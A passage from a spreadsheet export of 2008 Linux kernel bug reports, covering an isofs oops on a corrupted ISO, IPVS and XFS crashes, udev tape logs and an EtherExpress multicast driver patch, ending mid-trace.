    <t>Latest working kernel version: - Earliest failing kernel version: 2.6.25-03562-g3dc5063 Distribution: Ubuntu Problem Description: mounting a corrupted iso image and doing an ls results in an unhandled kernel paging request Steps to reproduce: try the following a few times it will usually create the crash in under 4 attempts mount -o loop iso9660.76.img /media/test/ &amp;&amp; ls /media/test &gt; /dev/null &amp;&amp; umount /media/test/ here is an example oops as recorded by kerneloops.org BUG: unable to handle kernel paging request at c66c2000 IP: [&lt;c0265624&gt;] get_joliet_filename+0xe4/0x190 *pde = 0ce46163 *pte = 066c2160 Oops: 0000 [#1] PREEMPT DEBUG_PAGEALLOC Modules linked in: nfsd exportfs Pid: 29113, comm: ls Not tainted (2.6.25-03562-g3dc5063 #16) EIP: 0060:[&lt;c0265624&gt;] EFLAGS: 00010296 CPU: 0 EIP is at get_joliet_filename+0xe4/0x190 EAX: ffffffea EBX: ccf39030 ECX: 00000000 EDX: 00002074 ESI: c66c1ffd EDI: c08e8b20 EBP: ccf58ef4 ESP: ccf58ed4 DS: 007b ES: 007b FS: 0000 GS: 0033 SS: 0068 Process ls (pid: 29113, ti=ccf58000 task=ccc5c000 task.ti=ccf58000) Stack: 00000005 ccf39000 c08e8b20 ccf39000 088036ac 0000277e c66c1f7e c66c1800 ccf58f68 c0264092 0000271d 00000000 c8197380 00000000 00000000 c0189970 ccf58f94 c1e86100 ccf39000 c73c401c c6107f70 00000065 ccaf58c0 00000001 Call Trace: [&lt;c0264092&gt;] ? isofs_readdir+0x312/0x4c0 [&lt;c0189970&gt;] ? filldir64+0x0/0xe0 [&lt;c0189b9b&gt;] ? vfs_readdir+0x7b/0x90 [&lt;c0189970&gt;] ? filldir64+0x0/0xe0 [&lt;c0189c1d&gt;] ? sys_getdents64+0x6d/0xd0 [&lt;c0103d75&gt;] ? sysenter_past_esp+0x6a/0xb1 ====================== ======================Code: 32 83 c6 02 ff 4d e0 74 2a 89 c2 8b 7d e8 b9 06 00 00 00 c1 ea 08 c1 e0 08 09 d0 89 da 0f b7 c0 ff 57 08 85 c0 7f d0 c6 03 3f 43 &lt;0f&gt; b7 46 02 85 c0 75 ce 8b 55 e4 89 d8 29 d0 88 c2 80 fa 02 c6 EIP: [&lt;c0265624&gt;] get_joliet_filename+0xe4/0x190 SS:ESP 0068:ccf58ed4 ---[ end trace 778e504de7e3b1e3 ]--- All code ======== 0: 8b 85 70 0d 00 00 mov 0xd70(%ebp),%eax 6: 0f b6 4e 02 movzbl 0x2(%esi),%ecx a: 3b 48 20 cmp 0x20(%eax),%ecx d: 77 22 ja 0x31 f: 8b 50 24 mov 0x24(%eax),%edx 12: 6b c1 34 imul $0x34,%ecx,%eax 15: 83 ea 34 sub $0x34,%edx 18: 01 c2 add %eax,%edx 1a: 74 15 je 0x31 1c: 0f b6 46 03 movzbl 0x3(%esi),%eax 20: 3b 42 2c cmp 0x2c(%edx),%eax 23: 77 0c ja 0x31 25: c1 e0 05 shl $0x5,%eax 28: 03 42 30 add 0x30(%edx),%eax 2b:* 8b 40 f0 mov 0xfffffff0(%eax),%eax &lt;-- trapping instruction 2e: 89 46 14 mov %eax,0x14(%esi) 31: 31 c0 xor %eax,%eax 33: 83 c4 3c add $0x3c,%esp 36: 5b pop %ebx 37: 5e pop %esi 38: 5f pop %edi 39: 5d pop %ebp 3a: c3 ret 3b: 55 push %ebp 3c: 57 push %edi 3d: 56 push %esi 3e: 53 push %ebx 3f: 89 .byte 0x89 Code starting with the faulting instruction =========================================== 0: 8b 40 f0 mov 0xfffffff0(%eax),%eax 3: 89 46 14 mov %eax,0x14(%esi) 6: 31 c0 xor %eax,%eax 8: 83 c4 3c add $0x3c,%esp b: 5b pop %ebx c: 5e pop %esi d: 5f pop %edi e: 5d pop %ebp f: c3 ret 10: 55 push %ebp 11: 57 push %edi 12: 56 push %esi 13: 53 push %ebx 14: 89 .byte 0x89 the problem is that in isofs/joilet.c uni16_to_x8() gets called from get_joliet_filename() with an invalid? de-&gt;name, which it tries to access, causing the error</t>
  </si>
  <si>
    <t>Reboot fails on newer Dell OptiPlex 745</t>
  </si>
  <si>
    <t>2.6.24.5</t>
  </si>
  <si>
    <t>2008-04-24 07:31 UTC</t>
  </si>
  <si>
    <t>Ben</t>
  </si>
  <si>
    <t>2008-05-05 07:40 UTC</t>
  </si>
  <si>
    <t>Hardware Environment: Dell OptiPlex 745 Steps to reproduce: Newer Dell OptiPlex 745s hang before rebooting after 'sudo reboot'. A patch for some versions of the OptiPlex was proposed here -- http://lkml.org/lkml/2007/6/5/59 -- and is included in 2.6.23 and later kernels, according to http://lxr.linux.no/linux+v2.6.23/arch/i386/kernel/reboot.c . However, the DMI_BOARD_NAME ("0WF810") is too restrictive. Newer OptiPlex machines have a DMI_BOARD_NAME of "0RF703". I therefore suggest adding another clause to reboot.c, similar to the one in the original patch, but matching a DMI_BOARD_NAME of "0RF703".</t>
  </si>
  <si>
    <t>IPVS sync_backup oops</t>
  </si>
  <si>
    <t>2.6.24.x</t>
  </si>
  <si>
    <t>2008-04-25 21:27 UTC</t>
  </si>
  <si>
    <t>L0op8ack</t>
  </si>
  <si>
    <t>2008-04-27 10:29 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.23.17 Earliest failing kernel version: 2.6.24 Distribution: kernel.org Hardware Environment: i386,P4 Software Environment: ipvsadm-1.24 Problem Description: MATSER ipvs box will push connection table to BACKUP one using multicast, while the BACKUP ipvs box received the multicast message, the BACKUP ipvs box will report BUG() and crash Steps to reproduce: +-------------+ |192.168.1.123| +------+------+ | --------------+-------+------------+-------- | VIP:192.168.1.219 | MASTER +-----+-----+ +-----+-----+ BACKUP eth1 |192.168.1.1| eth1 |192.168.1.2| eth0 |192.168.0.1| eth0 |192.168.0.2| +-----+-----+ +-----+-----+ |-&gt; multicast sync -&gt;| --------------+-------+------------+-------- | real-server +------------+ www service open |192.168.0.80| gateway 192.168.0.1 +------+-----+ 1) MASTER ipvs box: ipvsadm --start-daemon master --mcast-interface eth0 --syncid 80 BACKUP ipvs box: ipvsadm --start-daemon backup --mcast-interface eth0 --syncid 80 2) Both MASTER and BACKUP box: 2.1) define service ipvsadm -A -t 192.168.1.219:80 -s rr 2.2) add real-server ipvsadm -a -t 192.168.1.219:80 -r 192.168.0.80:80 -m # set real-server gateway = 192.168.0.1 3) client(192.168.1.123) access http://192.168.1.219, MATSER ipvs box will push connection table to BACKUP one using multicast, while the BACKUP ipvs box received the multicast message, the BACKUP ipvs box report BUG() and crash.</t>
  </si>
  <si>
    <t>[regression] latest git couse kernel oops.</t>
  </si>
  <si>
    <t>2008-04-26 00:19 UTC</t>
  </si>
  <si>
    <t>2008-05-25 04:54 UTC</t>
  </si>
  <si>
    <t>some patch betvene commit bad b1721d0da266b4af8cb4419473b4ca36206ab200 and commit good f360bf0015e5b3e82be61c68e0863b3f98852ee2 make kernel oops on boot. I can't bisect it becouse of compile error. Kernel: arch/x86/boot/bzImage is ready (#61) ERROR: "__locks_copy_lock" [fs/lockd/lockd.ko] undefined! make[1]: *** [__modpost] Fehler 1 make: *** [modules] Fehler 2 i think this commit 3dd7b71ca0f7ff8410a6b8cb15e5f670f90181e4</t>
  </si>
  <si>
    <t>2.6.24.4-64.fc8</t>
  </si>
  <si>
    <t>tape/by-id/ nodes not creating due to scsi_id not returning serial number, st nst</t>
  </si>
  <si>
    <t>2.6.25 and earlier, vanilla and gentoo alike, X64</t>
  </si>
  <si>
    <t>2008-04-27 15:13 UTC</t>
  </si>
  <si>
    <t>2008-05-18 12:58 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: unkn Earliest failing kernel version: unkn , but atleast 2.6.22 Distribution: gentoo X64 Hardware Environment: HP ML150, sym53c8xx card, LTO-2 external tape Software Environment: Gentoo, udev-120 Problem Description: udev creates the tape/by-id/ nodes for st* device but fails with nst devices, (or vs versa) (I WILL PUT THIS AS AN ATTACHMENT ALSO) The scsi_id program is returning no serial numbers in some cases. Steps to reproduce: Allways, but not allways in the same manner. I've had it create nst's and not st. (by_id, that is) and vs versa. Rules: This a 60-persistent-storage-tape.rules, modified to treat st and nst the same. It also ignores the nodes with the trailing letters (a,l,m) KERNEL=="st[0-9]", ENV{ID_SERIAL}!="?*", IMPORT{program}="scsi_id --export --whitelisted --fallback-to-sysfs -s %p -d $tempnode" KERNEL=="nst[0-9]", ENV{ID_SERIAL}!="?*", IMPORT{program}="scsi_id --export --whitelisted --fallback-to-sysfs -s %p -d $tempnode" KERNEL=="st[0-9]", ENV{ID_SERIAL}=="?*", SYMLINK+="tape/by-id/$env{ID_BUS}-$env{ID_SERIAL}" KERNEL=="nst[0-9]", ENV{ID_SERIAL}=="?*", SYMLINK+="tape/by-id/$env{ID_BUS}-$env{ID_SERIAL}-nst" I delete the /dev/tape/* directories and run udevadm trigger --subsystem-match="scsi_tape" Here is excerpt from udev log. It seems to me that the first to execute gets the serial number, others get blanks. udevd[2858]: msg_queue_insert: seq 4659 queued, \'add\' \'scsi_tape\' udevd[2858]: udev_event_run: seq 4659 forked, pid [13710], \'add\' \'scsi_tape\', 0 seconds old udevd[2858]: msg_queue_insert: seq 4660 queued, \'add\' \'scsi_tape\' udevd-event[13710]: run_program: \'scsi_id --export --whitelisted --fallback-to-sysfs -s /class/scsi_tape/nst0 -d /dev/.tmp-9-128\' udevd[2858]: udev_event_run: seq 4660 forked, pid [13711], \'add\' \'scsi_tape\', 0 seconds old udevd[2858]: msg_queue_insert: seq 4661 queued, \'add\' \'scsi_tape\' udevd-event[13711]: udev_rules_get_name: no node name set, will use kernel name \'nst0a\' udevd-event[13711]: udev_db_get_device: found a symlink as db file udevd-event[13711]: udev_device_event: device \'/class/scsi_tape/nst0a\' already in database, cleanup udevd-event[13711]: name_index: removing index: \'/dev/.udev/names/nst0a/\\x2fclass\\x2fscsi_tape\\x2fnst0a\' udevd-event[13711]: udev_node_add: creating device node \'/dev/nst0a\', major=9, minor=224, mode=0660, uid=0, gid=26 udevd-event[13711]: udev_node_mknod: preserve file \'/dev/nst0a\', because it has correct dev_t udevd-event[13711]: name_index: creating index: \'/dev/.udev/names/nst0a/\\x2fclass\\x2fscsi_tape\\x2fnst0a\' udevd-event[13713]: udev_rules_get_name: no node name set, will use kernel name \'nst0l\' udevd-event[13713]: udev_db_get_device: found a symlink as db file udevd-event[13713]: udev_device_event: device \'/class/scsi_tape/nst0l\' already in database, cleanup udevd-event[13713]: name_index: removing index: \'/dev/.udev/names/nst0l/\\x2fclass\\x2fscsi_tape\\x2fnst0l\' udevd-event[13713]: udev_node_add: creating device node \'/dev/nst0l\', major=9, minor=160, mode=0660, uid=0, gid=26 udevd-event[13713]: udev_node_mknod: preserve file \'/dev/nst0l\', because it has correct dev_t udevd-event[13713]: name_index: creating index: \'/dev/.udev/names/nst0l/\\x2fclass\\x2fscsi_tape\\x2fnst0l\' udevd-event[13711]: pass_env_to_socket: passed 293 bytes to socket \'/org/freedesktop/hal/udev_event\', udevd-event[13711]: pass_env_to_socket: passed -1 bytes to socket \'@/org/kernel/udev/monitor\', udevd-event[13711]: udev_event_run: seq 4660 finished with 0 udevd-event[13713]: pass_env_to_socket: passed 293 bytes to socket \'/org/freedesktop/hal/udev_event\', udevd-event[13713]: pass_env_to_socket: passed -1 bytes to socket \'@/org/kernel/udev/monitor\', udevd-event[13713]: udev_event_run: seq 4661 finished with 0 udevd[2858]: udev_event_run: seq 4661 forked, pid [13713], \'add\' \'scsi_tape\', 0 seconds old udevd[2858]: msg_queue_insert: seq 4662 queued, \'add\' \'scsi_tape\' udevd[2858]: udev_done: seq 4660, pid [13711] exit with 0, 0 seconds old udevd[2858]: udev_done: seq 4661, pid [13713] exit with 0, 0 seconds old udevd-event[13714]: udev_rules_get_name: no node name set, will use kernel name \'nst0m\' udevd-event[13714]: udev_db_get_device: found a symlink as db file udevd-event[13714]: udev_device_event: device \'/class/scsi_tape/nst0m\' already in database, cleanup udevd-event[13714]: name_index: removing index: \'/dev/.udev/names/nst0m/\\x2fclass\\x2fscsi_tape\\x2fnst0m\' udevd-event[13714]: udev_node_add: creating device node \'/dev/nst0m\', major=9, minor=192, mode=0660, uid=0, gid=26 udevd-event[13714]: udev_node_mknod: preserve file \'/dev/nst0m\', because it has correct dev_t udevd-event[13714]: name_index: creating index: \'/dev/.udev/names/nst0m/\\x2fclass\\x2fscsi_tape\\x2fnst0m\' udevd-event[13714]: pass_env_to_socket: passed 293 bytes to socket \'/org/freedesktop/hal/udev_event\', udevd-event[13714]: pass_env_to_socket: passed -1 bytes to socket \'@/org/kernel/udev/monitor\', udevd-event[13714]: udev_event_run: seq 4662 finished with 0 udevd[2858]: udev_event_run: seq 4662 forked, pid [13714], \'add\' \'scsi_tape\', 0 seconds old udevd[2858]: msg_queue_insert: seq 4663 queued, \'add\' \'scsi_tape\' udevd[2858]: udev_done: seq 4662, pid [13714] exit with 0, 0 seconds old udevd-event[13715]: run_program: \'scsi_id --export --whitelisted --fallback-to-sysfs -s /class/scsi_tape/st0 -d /dev/.tmp-9-0\' udevd[2858]: udev_event_run: seq 4663 forked, pid [13715], \'add\' \'scsi_tape\', 0 seconds old udevd[2858]: msg_queue_insert: seq 4664 queued, \'add\' \'scsi_tape\' udevd-event[13715]: run_program: \'/lib64/udev/scsi_id\' (stdout) \'ID_VENDOR=HP\' udevd-event[13715]: run_program: \'/lib64/udev/scsi_id\' (stdout) \'ID_MODEL=Ultrium_2-SCSI\' udevd-event[13715]: run_program: \'/lib64/udev/scsi_id\' (stdout) \'ID_REVISION=F63D\' udevd-event[13715]: run_program: \'/lib64/udev/scsi_id\' (stdout) \'ID_SERIAL=\' udevd-event[13715]: run_program: \'/lib64/udev/scsi_id\' (stdout) \'ID_SERIAL_SHORT=\' udevd-event[13715]: run_program: \'/lib64/udev/scsi_id\' (stdout) \'ID_TYPE=tape\' udevd-event[13715]: run_program: \'/lib64/udev/scsi_id\' (stdout) \'ID_BUS=scsi\' udevd-event[13715]: run_program: \'/lib64/udev/scsi_id\' returned with status 0 udevd-event[13715]: run_program: \'path_id /class/scsi_tape/st0\' udevd-event[13717]: udev_rules_get_name: no node name set, will use kernel name \'st0a\' udevd-event[13717]: udev_db_get_device: found a symlink as db file udevd-event[13717]: udev_device_event: device \'/class/scsi_tape/st0a\' already in database, cleanup udevd-event[13717]: name_index: removing index: \'/dev/.udev/names/st0a/\\x2fclass\\x2fscsi_tape\\x2fst0a\' udevd-event[13717]: udev_node_add: creating device node \'/dev/st0a\', major=9, minor=96, mode=0660, uid=0, gid=26 udevd-event[13717]: udev_node_mknod: preserve file \'/dev/st0a\', because it has correct dev_t udevd-event[13717]: name_index: creating index: \'/dev/.udev/names/st0a/\\x2fclass\\x2fscsi_tape\\x2fst0a\' udevd-event[13717]: pass_env_to_socket: passed 289 bytes to socket \'/org/freedesktop/hal/udev_event\', udevd-event[13717]: pass_env_to_socket: passed -1 bytes to socket \'@/org/kernel/udev/monitor\', udevd-event[13717]: udev_event_run: seq 4664 finished with 0 udevd[2858]: udev_event_run: seq 4664 forked, pid [13717], \'add\' \'scsi_tape\', 0 seconds old udevd[2858]: msg_queue_insert: seq 4665 queued, \'add\' \'scsi_tape\' udevd[2858]: udev_done: seq 4664, pid [13717] exit with 0, 0 seconds old udevd-event[13710]: run_program: \'/lib64/udev/scsi_id\' (stdout) \'ID_VENDOR=HP\' udevd-event[13710]: run_program: \'/lib64/udev/scsi_id\' (stdout) \'ID_MODEL=Ultrium_2-SCSI\' udevd-event[13710]: run_program: \'/lib64/udev/scsi_id\' (stdout) \'ID_REVISION=F63D\' udevd-event[13710]: run_program: \'/lib64/udev/scsi_id\' (stdout) \'ID_SERIAL=350060b00001f7cf9\' udevd-event[13710]: run_program: \'/lib64/udev/scsi_id\' (stdout) \'ID_SERIAL_SHORT=50060b00001f7cf9\' udevd-event[13710]: run_program: \'/lib64/udev/scsi_id\' (stdout) \'ID_TYPE=tape\' udevd-event[13710]: run_program: \'/lib64/udev/scsi_id\' (stdout) \'ID_BUS=scsi\' udevd-event[13710]: run_program: \'/lib64/udev/scsi_id\' returned with status 0 udevd-event[13710]: udev_rules_get_name: add symlink \'tape/by-id/scsi-350060b00001f7cf9-nst\' udevd-event[13710]: udev_rules_get_name: no node name set, will use kernel name \'nst0\' udevd-event[13710]: udev_device_event: device \'/class/scsi_tape/nst0\' already in database, cleanup udevd-event[13710]: name_index: removing index: \'/dev/.udev/names/nst0/\\x2fclass\\x2fscsi_tape\\x2fnst0\' udevd-event[13710]: name_index: removing index: \'/dev/.udev/names/tape\\x2fby-id\\x2fscsi-350060b00001f7cf9-nst/\\x2fclass\\x2fscsi_tape\\x2fnst0\' udevd-event[13710]: udev_node_add: creating device node \'/dev/nst0\', major=9, minor=128, mode=0660, uid=0, gid=26 udevd-event[13710]: udev_node_mknod: preserve file \'/dev/nst0\', because it has correct dev_t udevd-event[13710]: name_index: creating index: \'/dev/.udev/names/tape\\x2fby-id\\x2fscsi-350060b00001f7cf9-nst/\\x2fclass\\x2fscsi_tape\\x2fnst0\' udevd-event[13710]: name_index: creating index: \'/dev/.udev/names/nst0/\\x2fclass\\x2fscsi_tape\\x2fnst0\' udevd-event[13710]: udev_node_update_symlinks: update symlink \'tape/by-id/scsi-350060b00001f7cf9-nst\' of \'/class/scsi_tape/nst0\' udevd-event[13710]: udev_db_get_devices_by_name: found index directory \'/dev/.udev/names/tape\\x2fby-id\\x2fscsi-350060b00001f7cf9-nst\' udevd-event[13710]: update_link: found 1 devices with name \'tape/by-id/scsi-350060b00001f7cf9-nst\' udevd-event[13710]: update_link: found \'/class/scsi_tape/nst0\' for \'tape/by-id/scsi-350060b00001f7cf9-nst\' udevd-event[13710]: update_link: compare (our own) priority of \'/class/scsi_tape/nst0\' 0 &gt;= 0 udevd-event[13710]: update_link: \'tape/by-id/scsi-350060b00001f7cf9-nst\' with target \'nst0\' has the highest priority 0, create it udevd-event[13710]: node_symlink: creating symlink \'/dev/tape/by-id/scsi-350060b00001f7cf9-nst\' to \'../../nst0\' udevd-event[13710]: pass_env_to_socket: passed 482 bytes to socket \'/org/freedesktop/hal/udev_event\', udevd-event[13710]: pass_env_to_socket: passed -1 bytes to socket \'@/org/kernel/udev/monitor\', udevd-event[13710]: udev_event_run: seq 4659 finished with 0 udevd-event[13720]: udev_rules_get_name: no node name set, will use kernel name \'st0l\' udevd-event[13720]: udev_db_get_device: found a symlink as db file udevd-event[13720]: udev_device_event: device \'/class/scsi_tape/st0l\' already in database, cleanup udevd-event[13720]: name_index: removing index: \'/dev/.udev/names/st0l/\\x2fclass\\x2fscsi_tape\\x2fst0l\' udevd-event[13720]: udev_node_add: creating device node \'/dev/st0l\', major=9, minor=32, mode=0660, uid=0, gid=26 udevd-event[13720]: udev_node_mknod: preserve file \'/dev/st0l\', because it has correct dev_t udevd-event[13720]: name_index: creating index: \'/dev/.udev/names/st0l/\\x2fclass\\x2fscsi_tape\\x2fst0l\' udevd-event[13720]: pass_env_to_socket: passed 289 bytes to socket \'/org/freedesktop/hal/udev_event\', udevd-event[13720]: pass_env_to_socket: passed -1 bytes to socket \'@/org/kernel/udev/monitor\', udevd-event[13720]: udev_event_run: seq 4665 finished with 0 udevd[2858]: udev_event_run: seq 4665 forked, pid [13720], \'add\' \'scsi_tape\', 0 seconds old udevd[2858]: msg_queue_insert: seq 4666 queued, \'add\' \'scsi_tape\' udevd[2858]: udev_done: seq 4659, pid [13710] exit with 0, 0 seconds old udevd[2858]: udev_done: seq 4665, pid [13720] exit with 0, 0 seconds old udevd[2858]: udev_event_run: seq 4666 forked, pid [13723], \'add\' \'scsi_tape\', 0 seconds old udevd-event[13715]: run_program: \'/lib64/udev/path_id\' (stdout) \'ID_PATH=pci-0000:04:01.0-scsi-0:0:3:0-st\' udevd-event[13715]: run_program: \'/lib64/udev/path_id\' returned with status 0 udevd-event[13715]: udev_rules_get_name: add symlink \'tape/by-path/pci-0000:04:01.0-scsi-0:0:3:0-st\' udevd-event[13715]: udev_rules_get_name: no node name set, will use kernel name \'st0\' udevd-event[13715]: udev_device_event: device \'/class/scsi_tape/st0\' already in database, cleanup udevd-event[13715]: name_index: removing index: \'/dev/.udev/names/st0/\\x2fclass\\x2fscsi_tape\\x2fst0\' udevd-event[13715]: name_index: removing index: \'/dev/.udev/names/tape\\x2fby-path\\x2fpci-0000:04:01.0-scsi-0:0:3:0-st/\\x2fclass\\x2fscsi_tape\\x2fst0\' udevd-event[13715]: udev_node_add: creating device node \'/dev/st0\', major=9, minor=0, mode=0660, uid=0, gid=26 udevd-event[13715]: udev_node_mknod: preserve file \'/dev/st0\', because it has correct dev_t udevd-event[13715]: name_index: creating index: \'/dev/.udev/names/tape\\x2fby-path\\x2fpci-0000:04:01.0-scsi-0:0:3:0-st/\\x2fclass\\x2fscsi_tape\\x2fst0\' udevd-event[13715]: name_index: creating index: \'/dev/.udev/names/st0/\\x2fclass\\x2fscsi_tape\\x2fst0\' udevd-event[13715]: udev_node_update_symlinks: update symlink \'tape/by-path/pci-0000:04:01.0-scsi-0:0:3:0-st\' of \'/class/scsi_tape/st0\' udevd-event[13715]: udev_db_get_devices_by_name: found index directory \'/dev/.udev/names/tape\\x2fby-path\\x2fpci-0000:04:01.0-scsi-0:0:3:0-st\' udevd-event[13715]: update_link: found 1 devices with name \'tape/by-path/pci-0000:04:01.0-scsi-0:0:3:0-st\' udevd-event[13715]: update_link: found \'/class/scsi_tape/st0\' for \'tape/by-path/pci-0000:04:01.0-scsi-0:0:3:0-st\' udevd-event[13715]: update_link: compare (our own) priority of \'/class/scsi_tape/st0\' 0 &gt;= 0 udevd-event[13715]: update_link: \'tape/by-path/pci-0000:04:01.0-scsi-0:0:3:0-st\' with target \'st0\' has the highest priority 0, create it udevd-event[13715]: node_symlink: creating symlink \'/dev/tape/by-path/pci-0000:04:01.0-scsi-0:0:3:0-st\' to \'../../st0\' udevd-event[13715]: pass_env_to_socket: passed 493 bytes to socket \'/org/freedesktop/hal/udev_event\', udevd-event[13715]: pass_env_to_socket: passed -1 bytes to socket \'@/org/kernel/udev/monitor\', udevd-event[13715]: udev_event_run: seq 4663 finished with 0 udevd[2858]: udev_done: seq 4663, pid [13715] exit with 0, 0 seconds old udevd-event[13723]: udev_rules_get_name: no node name set, will use kernel name \'st0m\' udevd-event[13723]: udev_db_get_device: found a symlink as db file udevd-event[13723]: udev_device_event: device \'/class/scsi_tape/st0m\' already in database, cleanup udevd-event[13723]: name_index: removing index: \'/dev/.udev/names/st0m/\\x2fclass\\x2fscsi_tape\\x2fst0m\' udevd-event[13723]: udev_node_add: creating device node \'/dev/st0m\', major=9, minor=64, mode=0660, uid=0, gid=26 udevd-event[13723]: udev_node_mknod: preserve file \'/dev/st0m\', because it has correct dev_t udevd-event[13723]: name_index: creating index: \'/dev/.udev/names/st0m/\\x2fclass\\x2fscsi_tape\\x2fst0m\' udevd-event[13723]: pass_env_to_socket: passed 289 bytes to socket \'/org/freedesktop/hal/udev_event\', udevd-event[13723]: pass_env_to_socket: passed -1 bytes to socket \'@/org/kernel/udev/monitor\', udevd-event[13723]: udev_event_run: seq 4666 finished with 0 udevd[2858]: udev_done: seq 4666, pid [13723] exit with 0, 0 seconds old Any help gratefully received, John</t>
  </si>
  <si>
    <t>i8k driver should allow for a configurable fan speed adjustment</t>
  </si>
  <si>
    <t>2008-04-28 03:41 UTC</t>
  </si>
  <si>
    <t>2008-09-23 03:57 UTC</t>
  </si>
  <si>
    <t>The i8k driver multiplies the fan speed reported by the BIOS with a factor of 30. On my Dell Latitude D800, this factor is not required. I'd suggest to make this configurable, see attached patch.</t>
  </si>
  <si>
    <t>IPv6 to Intel EtherExpress 16 fails - multicast problems</t>
  </si>
  <si>
    <t>2008-04-30 04:02 UTC</t>
  </si>
  <si>
    <t>Bruce Robson</t>
  </si>
  <si>
    <t>2008-07-08 03:37 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Earliest failing kernel version: Distribution: Debian Hardware Environment: Intel ClassicR+ with Intel EtherExpress 16 Software Environment: Debian testing (lenny) Problem Description: I was unable to access a computer containing an Intel EtherExpress 16 network card using IPv6. I traced this to failure of neighbour discovery. When I used an "ip -6 neigh add" command, on the computer attempting access, to insert a binding between the IPv6 address of the computer with the Intel EtherExpress 16 network card and the card's ethernet address, I was able to access that computer using IPv6. Neighbour discovery requires working multicast. The driver sources file eexpress.c contains an approximately 30 line function eexp_setup_filter used when loading multicast addresses. I found 3 problems in this function 1) It wrote the number of multicast addresses to the card instead of the number of bytes in the multicast addresses. 2) When loading multiple multicast addresses it loaded the first one provided multiple times instead of loading each one once. 3) The setting of pointer 'data' from 'dmi-&gt;dmi_addr' occured before the test for the error situation of 'dmi' being NULL. Correcting these problems allows the computer with the Intel EtherExpress 16 network card to found by IPv6 neighbour discovery. p.s. There is some information on the Intel EtherExpress 16 at http://www.intel.com/support/etherexpress/vintage/sb/cs-013500.htm Datasheet for the Intel 82586 ethernet controller used by the card http://www.datasheetcatalog.com/datasheets_pdf/8/2/5/8/82586.shtml --- eexpress.c.000 2008-01-24 22:58:37.000000000 +0000 +++ eexpress.c 2008-04-30 00:17:51.000000000 +0100 @@ -201,9 +201,9 @@ 0x0000,Cmd_MCast, 0x0076, /* link to next command */ #define CONF_NR_MULTICAST 0x44 - 0x0000, /* number of multicast addresses */ + 0x0000, /* number of bytes in multicast address(es) */ #define CONF_MULTICAST 0x46 0x0000, 0x0000, 0x0000, /* some addresses */ 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, @@ -1568,9 +1568,9 @@ } static void eexp_setup_filter(struct net_device *dev) { - struct dev_mc_list *dmi = dev-&gt;mc_list; + struct dev_mc_list *dmi; unsigned short ioaddr = dev-&gt;base_addr; int count = dev-&gt;mc_count; int i; if (count &gt; 8) { @@ -1579,19 +1579,20 @@ count = 8; } outw(CONF_NR_MULTICAST &amp; ~31, ioaddr+SM_PTR); - outw(count, ioaddr+SHADOW(CONF_NR_MULTICAST)); - for (i = 0; i &lt; count; i++) { - unsigned short *data = (unsigned short *)dmi-&gt;dmi_addr; + outw(6*count, ioaddr+SHADOW(CONF_NR_MULTICAST)); + for (i = 0, dmi = dev-&gt;mc_list; i &lt; count; i++, dmi = dmi-&gt;next) { + unsigned short *data; if (!dmi) { printk(KERN_INFO "%s: too few multicast addresses\n", de v-&gt;name); break; } if (dmi-&gt;dmi_addrlen != ETH_ALEN) { printk(KERN_INFO "%s: invalid multicast address length g iven.\n", dev-&gt;name); continue; } + data = (unsigned short *)dmi-&gt;dmi_addr; outw((CONF_MULTICAST+(6*i)) &amp; ~31, ioaddr+SM_PTR); outw(data[0], ioaddr+SHADOW(CONF_MULTICAST+(6*i))); outw((CONF_MULTICAST+(6*i)+2) &amp; ~31, ioaddr+SM_PTR); outw(data[1], ioaddr+SHADOW(CONF_MULTICAST+(6*i)+2));</t>
  </si>
  <si>
    <t>Description of CONFIG_NONPROMISC_DEVMEM is worded very poorly</t>
  </si>
  <si>
    <t>v2.6.25-6679-g0ff5ce7</t>
  </si>
  <si>
    <t>2008-04-30 04:20 UTC</t>
  </si>
  <si>
    <t>Thomas Bleher</t>
  </si>
  <si>
    <t>2008-09-04 13:56 UTC</t>
  </si>
  <si>
    <t>Earliest failing kernel version: v2.6.25-3531-gae531c2 (ae531c26c5c2a28ca1b35a75b39b3b256850f2c8) Problem Description: I find the help text for CONFIG_NONPROMISC_DEVMEM poorly worded. As a non-native speaker, I had to resort to reading the source code to find if a "Y" would enable or disable promiscuous access. Suggested solution: Either remove one negation (i.e. change NONPROMISC_DEVMEM to PROMISC_DEVMEM) or change the help text so it reads: "To enable promiscuous access to /dev/mem say Y" (which by the way feels quite wrong if the option is called *NON*PROMISC_DEVMEM)</t>
  </si>
  <si>
    <t>INFO: task pdflush:27505 blocked for more than 120 seconds.</t>
  </si>
  <si>
    <t>2.6.25-git7 and later</t>
  </si>
  <si>
    <t>2008-05-01 02:30 UTC</t>
  </si>
  <si>
    <t>2008-05-25 11:17 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.25, maybe up to 2.6.25-git6 Earliest failing kernel version: 2.6.25-git7 Distribution: Bluewhite64 Hardware Environment: GA-P35-DS3R mobo, Intel E4300 CPU, 2 GB RAM, 500 GB WD SATA HDD Software Environment: KDE desktop Problem Description: some processes get into a stall, effectively killing all write access to the root partition (XFS); a lot of messeges in the logs like this (if I wait long enough) : [ 1032.940632] INFO: task xfsdatad/0:317 blocked for more than 120 seconds. [ 1032.940638] "echo 0 &gt; /proc/sys/kernel/hung_task_timeout_secs" disables this message. [ 1032.940642] xfsdatad/0 D ffff81000102cdc0 0 317 2 [ 1032.940683] ffff81007f9bbdd0 0000000000000046 0000000000000000 0000000000000000 [ 1032.940691] ffff81007fb335a0 ffffffff8089c4a0 ffff81007fb338e8 000000010000ea09 [ 1032.940697] 0000000000000000 0000000000000000 0000000000000003 0000000000000000 [ 1032.940703] Call Trace: [ 1032.940711] [&lt;ffffffff803a1f60&gt;] xfs_end_bio_delalloc+0x0/0x20 [ 1032.940717] [&lt;ffffffff806b8a29&gt;] __down_write_nested+0x79/0xc0 [ 1032.940800] [&lt;ffffffff8037f125&gt;] xfs_ilock+0xa5/0xe0 [ 1032.940811] [&lt;ffffffff803a1db0&gt;] xfs_setfilesize+0x40/0xc0 [ 1032.940814] [&lt;ffffffff803a1f70&gt;] xfs_end_bio_delalloc+0x10/0x20 [ 1032.940817] [&lt;ffffffff8024c8f0&gt;] run_workqueue+0x140/0x220 [ 1032.940820] [&lt;ffffffff8024caa0&gt;] worker_thread+0x0/0xd0 [ 1032.940822] [&lt;ffffffff8024cb31&gt;] worker_thread+0x91/0xd0 [ 1032.940825] [&lt;ffffffff80250840&gt;] 